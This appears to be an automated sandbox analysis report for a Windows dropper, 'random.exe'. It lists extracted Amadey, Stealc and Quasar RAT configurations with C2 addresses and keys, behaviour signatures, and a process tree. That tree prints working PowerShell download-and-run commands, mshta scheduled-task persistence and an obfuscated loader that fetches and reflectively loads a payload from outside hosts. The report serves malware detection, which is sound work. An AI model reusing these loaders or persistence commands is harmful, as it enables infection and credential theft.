Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/03/2025, 16:39

General

  • Target

    random.exe

  • Size

    938KB

  • MD5

    bcefbd57340b3f8c39699195c2946d69

  • SHA1

    73eb2f2c99d6a7141fc577d9375ae3992ac58b4a

  • SHA256

    8339734ef64625aea2605628510e071dccbb57941c2dd068c8b34fc859c4f2ec

  • SHA512

    a9cdc53ff3b7b5c6913353a70a268e88a61dd1a7b4ad9f2cf5657b28ff5b612cf8c20275e070c54a31acb83ea1608d273c2217e56415e1a8c0626c6b82681b9f

  • SSDEEP

    24576:9qDEvCTbMWu7rQYlBQcBiT6rprG8a0Ju:9TvC/MTQYxsWR7a0J

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 1 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 4 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 22 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 58 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 55 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3048
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn PfBDhmaaSzF /tr "mshta C:\Users\Admin\AppData\Local\Temp\ShcXBXxcs.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2436
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn PfBDhmaaSzF /tr "mshta C:\Users\Admin\AppData\Local\Temp\ShcXBXxcs.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2076
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\ShcXBXxcs.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2380
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BSAV6XKN4JAR2LNZ9ECOXGRZACBQJN3Y.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2396
        • C:\Users\Admin\AppData\Local\TempBSAV6XKN4JAR2LNZ9ECOXGRZACBQJN3Y.EXE
          "C:\Users\Admin\AppData\Local\TempBSAV6XKN4JAR2LNZ9ECOXGRZACBQJN3Y.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2184
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe
              "C:\Users\Admin\AppData\Local\Temp\10300440101\FdqlBTs.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:1580
              • C:\Windows\system32\cmd.exe
                cmd.exe /c 1.bat && 2.js
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:1604
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic cpu get name
                  8⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2744
                • C:\Windows\system32\find.exe
                  find "QEMU"
                  8⤵
                    PID:2596
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2908
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                      9⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:444
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
                    8⤵
                      PID:1408
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\10301280121\am_no.cmd" "
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2236
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 2
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Delays execution with timeout.exe
                    PID:892
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1312
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:784
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2332
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2388
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:264
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2228
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn "xRVCqmaSzxk" /tr "mshta \"C:\Temp\tbN9MGoDZ.hta\"" /sc minute /mo 25 /ru "Admin" /f
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:2416
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta "C:\Temp\tbN9MGoDZ.hta"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Modifies Internet Explorer settings
                    PID:1072
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2852
                      • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                        9⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2528
                • C:\Users\Admin\AppData\Local\Temp\10301480101\6c20b51091.exe
                  "C:\Users\Admin\AppData\Local\Temp\10301480101\6c20b51091.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2756
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301480101\6c20b51091.exe"
                    7⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1180
                • C:\Users\Admin\AppData\Local\Temp\10301490101\78781786cf.exe
                  "C:\Users\Admin\AppData\Local\Temp\10301490101\78781786cf.exe"
                  6⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2716
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10301490101\78781786cf.exe"
                    7⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2488
                • C:\Users\Admin\AppData\Local\Temp\10301500101\laf6w_001.exe
                  "C:\Users\Admin\AppData\Local\Temp\10301500101\laf6w_001.exe"
                  6⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2652
                • C:\Users\Admin\AppData\Local\Temp\10301510101\b5040d7e3f.exe
                  "C:\Users\Admin\AppData\Local\Temp\10301510101\b5040d7e3f.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2860
                  • C:\Windows\system32\WerFault.exe
